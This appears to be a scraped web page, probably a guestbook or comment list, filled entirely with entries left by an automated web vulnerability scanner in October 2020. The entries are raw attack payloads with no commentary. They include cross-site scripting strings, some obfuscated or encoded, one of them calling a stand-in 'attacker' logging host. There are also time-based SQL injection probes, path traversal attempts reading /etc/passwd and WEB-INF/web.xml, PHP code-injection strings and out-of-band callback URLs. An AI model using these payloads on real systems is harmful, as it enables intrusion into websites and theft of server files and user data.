GRLpGpAG<img src=xyz OnErRor=U7Ix(9861)> [116.113.93.82] 2020-10-28 19:03:04

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=U7Ix(9435)> [116.113.93.82] 2020-10-28 19:03:01

1

GRLpGpAG<body onload=U7Ix(9648)> [116.113.93.82] 2020-10-28 19:02:59

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9792'> [116.113.93.82] 2020-10-28 19:02:56

1

GRLpGpAG<isindex type=image src=1 onerror=U7Ix(9947)> [116.113.93.82] 2020-10-28 19:02:53

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 19:02:50

1

GRLpGpAG<video><source onerror="javascript:U7Ix(9106)"> [116.113.93.82] 2020-10-28 19:02:48

1

GRLpGpAG<ScRiPt >U7Ix(9787)</ScRiPt> [116.113.93.82] 2020-10-28 19:02:44

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9729></ScRiPt> [116.113.93.82] 2020-10-28 19:02:41

1

GRLpGpAG<ScRiPt >U7Ix(9970)</ScRiPt> [116.113.93.82] 2020-10-28 19:02:38

1

GRLpGpAG<ScR<ScRiPt>IpT>U7Ix(9109)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 19:02:35

1

GRLpGpAG<script>U7Ix(9233)</script> [116.113.93.82] 2020-10-28 19:02:32

1

GRLpGpAG<WL13TI>IVI9X[!+!]</WL13TI> [116.113.93.82] 2020-10-28 19:02:29

1

GRLpGpAG<ScRiPt >U7Ix(9743)</ScRiPt> [116.113.93.82] 2020-10-28 19:02:27

1

{{10000363*9999478}} [116.113.93.82] 2020-10-28 19:02:24

1

acux4305 [116.113.93.82] 2020-10-28 19:02:20

1

acu6668<s1﹥s2ʺs3ʹuca6668 [116.113.93.82] 2020-10-28 19:02:18

1

{{10000261*9999540}} [116.113.93.82] 2020-10-28 19:02:15

1

acux1601 [116.113.93.82] 2020-10-28 19:02:11

1

acu5615<s1﹥s2ʺs3ʹuca5615 [116.113.93.82] 2020-10-28 19:02:08

1

GRLpGpAG9668985 [116.113.93.82] 2020-10-28 19:02:05

1

'"()&%<acx><ScRiPt >U7Ix(9707)</ScRiPt> [116.113.93.82] 2020-10-28 19:02:02

1

GRLpGpAG'"()&%<acx><ScRiPt >U7Ix(9167)</ScRiPt> [116.113.93.82] 2020-10-28 19:01:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:57

1<2Ey5I9<

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:53

1<img sRc='http://attacker-9015/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:51

1<Zh3tVF x=9759>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:48

1<ifRAme sRc=9921.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:46

1<WDXPOO>U53XE[!+!]</WDXPOO>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:42

101voH <ScRiPt >U7Ix(9496)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:40

1<% contenteditable onresize=U7Ix(9422)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:37

1}body{acu:Expre/**/SSion(U7Ix(9011))}

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:34

1<img<!-- --> src=x onerror=alert(9061);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:31

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:28

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:25

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:22

1<input autofocus onfocus=U7Ix(9669)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:20

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:17

1<ScRiPt>U7Ix(9066)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:15

1\u003CScRiPt\U7Ix(9308)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:11

%31%3C%53%63%52%69%50%74%20%3E%55%37%49%78%289431%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:09

1<img/src=">" onerror=alert(9005)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:05

1<img src=xyz OnErRor=U7Ix(9587)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:03

1<img src=//testasp.vulnweb.com/t/dot.gif onload=U7Ix(9272)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:01:00

1<body onload=U7Ix(9649)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:57

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9403'>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:54

1<isindex type=image src=1 onerror=U7Ix(9751)>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:51

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:49

1<video><source onerror="javascript:U7Ix(9260)">

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:46

1<ScRiPt >U7Ix(9569)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:43

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9169></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:39

1<ScRiPt >U7Ix(9346)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:37

1<ScR<ScRiPt>IpT>U7Ix(9121)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:34

1<script>U7Ix(9426)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:31

1<WT6VCL>UDSOJ[!+!]</WT6VCL>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:28

1<ScRiPt >U7Ix(9401)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:25

{{9999294*9999234}}

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:22

acux9950

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:19

acu9807<s1﹥s2ʺs3ʹuca9807

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:16

19877775

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:13

'"()&%<acx><ScRiPt >U7Ix(9488)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:10

1'"()&%<acx><ScRiPt >U7Ix(9651)</ScRiPt>

GRLpGpAG [116.113.93.82<bCd7NA<] 2020-10-28 19:00:05

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9265/log.php?] 2020-10-28 19:00:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:00

1

GRLpGpAG [116.113.93.82<35yVK5 x=9026>] 2020-10-28 18:59:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:57

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9924.com></IfRamE>] 2020-10-28 18:59:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:54

1

GRLpGpAG [116.113.93.82<W9K6YX>97GAV[!+!]</W9K6YX>] 2020-10-28 18:59:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:51

1

GRLpGpAG [116.113.93.82qgQiM <ScRiPt >U7Ix(9581)</ScRiPt>] 2020-10-28 18:59:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:49

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=U7Ix(9974)>] 2020-10-28 18:59:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:46

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(U7Ix(9866))}] 2020-10-28 18:59:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:42

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9511);//><!-- -->] 2020-10-28 18:59:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:40

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 18:59:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:38

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 18:59:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:35

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 18:59:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:31

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=U7Ix(9345)>] 2020-10-28 18:59:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:29

1

GRLpGpAG [] 2020-10-28 18:59:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:27

1

GRLpGpAG [116.113.93.82<ScRiPt>U7Ix(9375)</sCripT>] 2020-10-28 18:59:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:24

1

GRLpGpAG [116.113.93.82\u003CScRiPt\U7Ix(9991)\u003C/sCripT\u003E] 2020-10-28 18:59:23

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%55%37%49%78%289249%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 18:59:20

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9827)>] 2020-10-28 18:59:18

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=U7Ix(9718)>] 2020-10-28 18:59:15

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=U7Ix(9526)>] 2020-10-28 18:59:12

1

GRLpGpAG [116.113.93.82<body onload=U7Ix(9589)>] 2020-10-28 18:59:09

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9376'>] 2020-10-28 18:59:07

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 18:59:05

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=U7Ix(9179)>] 2020-10-28 18:59:03

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 18:59:03

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 18:59:02

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 18:59:01

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 18:59:01

1

file:///etc/passwd [116.113.93.82] 2020-10-28 18:59:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:59

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 18:58:59

1

GRLpGpAG [116.113.93.82<video><source onerror="javascript:U7Ix(9617)">] 2020-10-28 18:58:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:58

1

.. [116.113.93.82] 2020-10-28 18:58:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:57

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 18:58:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:56

1

GRLpGpAG [116.113.93.82<ScRiPt >U7Ix(9061)</ScRiPt>] 2020-10-28 18:58:56

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 18:58:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:55

1

bhMEahMI'));select pg_sleep(3); -- [116.113.93.82] 2020-10-28 18:58:54

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 18:58:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:54

1

x2blJF2k');select pg_sleep(3); -- [116.113.93.82] 2020-10-28 18:58:53

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 18:58:53

1

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9677></ScRiPt>] 2020-10-28 18:58:53

1

Edjq1GOg';select pg_sleep(3); -- [116.113.93.82] 2020-10-28 18:58:52

1

/etc/passwd [116.113.93.82] 2020-10-28 18:58:52

1

sUTdqNBL'; waitfor delay '0:0:3' -- [116.113.93.82] 2020-10-28 18:58:51

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 18:58:50

1

GRLpGpAG [116.113.93.82<ScRiPt >U7Ix(9942)</ScRiPt>] 2020-10-28 18:58:50

1

1 waitfor delay '0:0:9' -- [116.113.93.82] 2020-10-28 18:58:50

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 18:58:49

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ [116.113.93.82] 2020-10-28 18:58:49

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 18:58:49

1

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z [116.113.93.82] 2020-10-28 18:58:48

1

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>U7Ix(9782)</sCr<ScRiPt>IpT>] 2020-10-28 18:58:48

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 18:58:48

1

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z [116.113.93.82] 2020-10-28 18:58:47

1

if(now()=sysdate(),sleep(9),0) [116.113.93.82] 2020-10-28 18:58:46

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 18:58:46

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 18:58:45

1

-1" OR 2+613-613-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 18:58:45

1

GRLpGpAG [116.113.93.82<script>U7Ix(9294)</script>] 2020-10-28 18:58:45

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 18:58:44

1

-1' OR 2+225-225-1=0+0+0+1 or 'iJrh6wbz'=' [116.113.93.82] 2020-10-28 18:58:44

1

[116.113.93.82] 2020-10-28 18:58:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:43

WEB-INF\web.xml

-1' OR 2+670-670-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 18:58:43

1

[116.113.93.82] 2020-10-28 18:58:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:42

WEB-INF/web.xml

GRLpGpAG [116.113.93.82<W1PQF7>ZPOTL[!+!]</W1PQF7>] 2020-10-28 18:58:42

1

-1 OR 2+717-717-1=0+0+0+1 [116.113.93.82] 2020-10-28 18:58:42

1

JyI= [116.113.93.82] 2020-10-28 18:58:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:41

/WEB-INF/web.xml

-1 OR 2+931-931-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 18:58:40

1

@@A65xh [116.113.93.82] 2020-10-28 18:58:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:40

/\../\../\../\../\../\../\../etc/passwd

jqxATagh [116.113.93.82] 2020-10-28 18:58:39

1

1 [116.113.93.82] 2020-10-28 18:58:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:39

file:///etc/passwd

GRLpGpAG [116.113.93.82<ScRiPt >U7Ix(9124)</ScRiPt>] 2020-10-28 18:58:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:39

1

\ [116.113.93.82] 2020-10-28 18:58:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:38

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:37

..

1'" [116.113.93.82] 2020-10-28 18:58:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:37

a4U3ZVor'));select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:36

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:36

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:36

cACcuFls');select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:35

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:35

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:35

xLGFRrdp';select pg_sleep(9); --

GRLpGpAG [{{9999708*9999083}}] 2020-10-28 18:58:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:33

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:33

-1));select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:33

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:32

-1);select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:32

@@ZapLO

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:32

%2fetc%2fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:31

1

GRLpGpAG [acux5823] 2020-10-28 18:58:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:31

-1;select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:31

/etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:30

gQFieOvk'; waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:30

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:29

1 waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:29

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:29

\

GRLpGpAG [acu7635<s1﹥s2ʺs3ʹuca7635] 2020-10-28 18:58:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:28

-1); waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:28

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:28

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:28

-1; waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:27

../../../../../../../../../../etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:26

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

GRLpGpAG [116.113.93.829721734] 2020-10-28 18:58:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:26

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

<!-- [116.113.93.82] 2020-10-28 18:58:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:25

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:25

../../../../../../../../../../../../../../../proc/version

'" [116.113.93.82] 2020-10-28 18:58:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:24

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:24

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:23

1

GRLpGpAG ['"()&%<acx><ScRiPt >U7Ix(9657)</ScRiPt>] 2020-10-28 18:58:23

1

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 18:58:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:23

if(now()=sysdate(),sleep(9),0)

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:23

<!--

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:22

1

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 18:58:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:22

-1" OR 2+64-64-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:22

'"

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:21

-1' OR 2+90-90-1=0+0+0+1 or 'XTKMO1FN'='

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 18:58:21

1

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >U7Ix(9102)</ScRiPt>] 2020-10-28 18:58:21

1

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 18:58:20

1

/www.vulnweb.com [116.113.93.82] 2020-10-28 18:58:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:20

-1' OR 2+825-825-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:20

1

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 18:58:19

1

create/. [116.113.93.82] 2020-10-28 18:58:19

1

GRLpGpAG [] 2020-10-28 18:58:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:19

/www.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:19

-1 OR 2+167-167-1=0+0+0+1

GRLpGpAG [<!--] 2020-10-28 18:58:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:18

${@print(md5(acunetix_wvs_security_test))}\

create [116.113.93.82] 2020-10-28 18:58:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:18

-1 OR 2+160-160-1=0+0+0+1 --

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 18:58:18

1

GRLpGpAG ['"] 2020-10-28 18:58:18

1

GRLpGpAG [] 2020-10-28 18:58:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:18

${@print(md5(acunetix_wvs_security_test))}

GRLpGpAG [/www.vulnweb.com] 2020-10-28 18:58:18

1

create [116.113.93.82] 2020-10-28 18:58:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:17

mbjmk0bE

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:17

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:17

1

GRLpGpAG [JyI=] 2020-10-28 18:58:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:17

create/.

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:17

";print(md5(acunetix_wvs_security_test));$a="

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:16

1

GRLpGpAG [@@OlNTb] 2020-10-28 18:58:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:15

';print(md5(acunetix_wvs_security_test));$a='

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:15

create

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:15

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 18:58:15

1

GRLpGpAG [1] 2020-10-28 18:58:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:14

;print(md5(acunetix_wvs_security_test));

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:14

create

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:14

1

http://hiteVXLBFkXEx.bxss.me/ [116.113.93.82] 2020-10-28 18:58:14

1

GRLpGpAG [\] 2020-10-28 18:58:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:13

1

testasp.vulnweb.com [116.113.93.82] 2020-10-28 18:58:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:12

http://hitTosRRx3xNz.bxss.me/

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:12

1

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 18:58:12

1

GRLpGpAG [1'"] 2020-10-28 18:58:11

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 18:58:11

1

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 18:58:11

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:10

1

GRLpGpAG [create/.] 2020-10-28 18:58:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:10

testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [create] 2020-10-28 18:58:09

1

